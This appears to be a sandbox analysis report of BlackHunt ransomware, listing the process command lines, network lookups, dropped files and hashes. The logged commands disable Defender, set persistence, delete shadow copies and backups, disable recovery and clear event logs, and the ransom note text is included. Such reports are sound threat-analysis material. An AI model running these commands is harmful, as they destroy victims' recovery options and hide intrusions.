"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5532 -ip 5532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 1464

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp

Files

C:\ProgramData\#BlackHunt_Private.key

MD5 f4f7988587a465bd6c04a49016b70cf0
SHA1 bcff36a016e1eceef0c4e7e69628cfa59607559a
SHA256 acf0eb663609da6c6fd62981337ed363a80a14f3b5c4eb34cc577fed09816559
SHA512 529f58a068f531fb13b53e79c7539048d9ed01a90a54cd004e8b4b24b832f8e70b43086196abe79920502511f90ef714a448c128c2c24bd5428ad1875bf36d69

C:\ProgramData\#BlackHunt_ReadMe.hta

MD5 ae2d3987e6ba5b4ea92f317998a2a4f9
SHA1 01ee99194e752192c4a0ac4f19762584d8e17389
SHA256 8dfabb55bec408a83f2f68bf18dbde381e9f994959be8a703083ff2a0ed5f1b2
SHA512 c49de0560b0ef753aa21a3461f7585d5c01f490c0cad23bc6dcc7bb7c8886e422f044d92d04279088626a44d4e0711cfbddc71111f5a850332ae55549499abbd

F:\#BlackHunt_ReadMe.txt

MD5 3ab22aac08208efb070cc3d8fbe7be68
SHA1 ce5153241004f82b9c34e6c24075e81fee1cab2c
SHA256 b4ea9f97cee7b607bfacf88b2f097a5496686a43d1516008e7d2811f60b803f7
SHA512 5dd64fff7909744b3408a2567c046eb2b5b7474f8549296941a51f018ed442fc5bf2024e108f315df8a7c2d3d481f45c8581feedcf7748394b99e3c80e35e724